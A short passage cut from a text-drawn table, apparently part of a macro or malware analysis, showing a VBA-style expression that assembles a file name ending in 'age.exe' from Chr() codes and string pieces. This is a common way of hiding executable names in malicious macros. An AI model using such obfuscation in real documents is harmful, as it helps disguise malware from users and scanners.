885. |            |                      | Chr(97) & "g" & "e" & Chr(46) &         |
886. |            |                      | Chr(101) & "x" & Chr(101)               |
887. +------------+----------------------+-----------------------------------------+